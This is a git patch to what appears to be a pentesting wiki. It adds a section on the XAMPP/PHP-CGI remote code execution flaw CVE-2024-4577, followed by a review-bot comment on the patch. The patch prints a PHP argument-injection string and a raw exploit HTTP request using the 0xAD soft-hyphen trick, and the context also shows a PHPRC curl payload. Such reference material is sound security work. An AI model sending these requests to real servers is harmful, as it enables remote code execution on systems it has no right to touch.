From 35598145a496f11ed6a32ca48c598444e3ec7a1b Mon Sep 17 00:00:00 2001 From: CPol Date: Wed, 17 Jul 2024 12:15:26 +0000 Subject: [PATCH] GITBOOK-4368: No subject --- .../pentesting-web/php-tricks-esp/README.md | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index ae039fe40..6be00a853 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/README.md 
@@ -336,6 +336,31 @@ If you find a vulnerability that allows you to **modify env variables in PHP** ( * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'` * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845). +### XAMPP CGI RCE - CVE-2024-4577 + +The webserver parses HTTP requests and passes them to a PHP script executing a request such as as [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com) as `php.exe cgi.php foo=bar`, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body: + +```jsx +-d allow_url_include=1 -d auto_prepend_file=php://input +``` + +Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check. the exploit example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/): + +```jsx +POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 +Host: {{host}} +User-Agent: curl/8.3.0 +Accept: */* +Content-Length: 23 +Content-Type: application/x-www-form-urlencoded +Connection: keep-alive + + + +``` + ## PHP Static analysis Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):
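Review bot: in the added "XAMPP CGI RCE - CVE-2024-4577" section the HTTP request example is inconsistent with itself: it declares `Content-Length: 23` but the body after the blank line is empty, so a reader cannot see which PHP code `auto_prepend_file=php://input` is meant to prepend; either include the 23-byte body or drop the `Content-Length` header so the example matches what it shows. Both fenced blocks are tagged `jsx` although the first is a `php.exe` argument list and the second a raw HTTP request; `bash` and `http` would be the accurate tags. The prose has two typos, "such as as" and "Check. the exploit example", and the markdown link around `http://host/cgi.php?foo=bar` carries an escaped `\&ref=labs.watchtowr.com` tracking parameter on a placeholder host, so it should be plain inline code rather than a link. Finally, the explanation "due to later normalization of PHP" does not say what is normalized (the 0xAD byte being mapped to `-`) nor which configurations or PHP releases are affected or fixed; one sentence on that would let defenders decide whether they are exposed.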